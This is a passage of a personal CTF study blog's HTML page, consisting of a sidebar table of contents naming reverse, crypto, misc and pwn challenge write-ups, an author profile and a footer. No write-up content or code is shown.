class="nav-number">2.2.</span> <span class="nav-text">Reverse</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#hiahia-o-%E2%96%BD-%E2%94%9B"><span class="nav-number">2.2.1.</span> <span class="nav-text">hiahia o(^▽^)┛</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#ANDROID"><span class="nav-number">2.2.2.</span> <span class="nav-text">ANDROID</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#WAY"><span class="nav-number">2.2.3.</span> <span class="nav-text">WAY</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Crypto"><span class="nav-number">2.3.</span> <span class="nav-text">Crypto</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#Easy-SignIn"><span class="nav-number">2.3.1.</span> <span class="nav-text">Easy SignIn</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#RSA"><span class="nav-number">2.3.2.</span> <span class="nav-text">RSA</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#AFFINE"><span class="nav-number">2.3.3.</span> <span class="nav-text">AFFINE</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Misc"><span class="nav-number">2.4.</span> <span class="nav-text">Misc</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#Sign-in"><span class="nav-number">2.4.1.</span> <span class="nav-text">Sign-in</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#DORAEMON"><span class="nav-number">2.4.2.</span> <span class="nav-text">DORAEMON</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Pwn"><span class="nav-number">2.5.</span> <span class="nav-text">Pwn</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#Ez-pwn"><span class="nav-number">2.5.1.</span> <span class="nav-text">Ez_pwn</span></a></li></ol></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BB%A5%E6%AD%A4%E4%B8%BA%E5%88%86%E5%89%B2%E7%BA%BF%EF%BC%8C%E4%BB%A5%E4%B8%8A%E6%98%AF%E8%87%AA%E5%B7%B1%E5%81%9A%E5%87%BA%E7%9A%84%EF%BC%8C%E4%BB%A5%E4%B8%8B%E6%98%AF%E5%A4%8D%E7%8E%B0%E7%9A%84%E3%80%82"><span class="nav-number">3.</span> <span class="nav-text">以此为分割线，以上是自己做出的，以下是复现的。</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#misc"><span class="nav-number">3.1.</span> <span class="nav-text">misc</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#%E6%B1%9D%E9%97%BB-%E4%BA%BA%E8%A8%80%E5%90%A6"><span class="nav-number">3.1.1.</span> <span class="nav-text">汝闻,人言否</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#PERFORMANCE-ART"><span class="nav-number">3.1.2.</span> <span class="nav-text">PERFORMANCE-ART</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link"><span class="nav-number">3.2.</span> <span class="nav-text"></span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#WIRESHARK"><span class="nav-number">3.2.1.</span> <span class="nav-text">WIRESHARK</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="N9-zqc"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">N9-zqc</p>
  <div class="site-description" itemprop="description">主要有关ctf的学习笔记，主攻逆向和Web</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives">
          <span class="site-state-item-count">7</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">N9-zqc</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
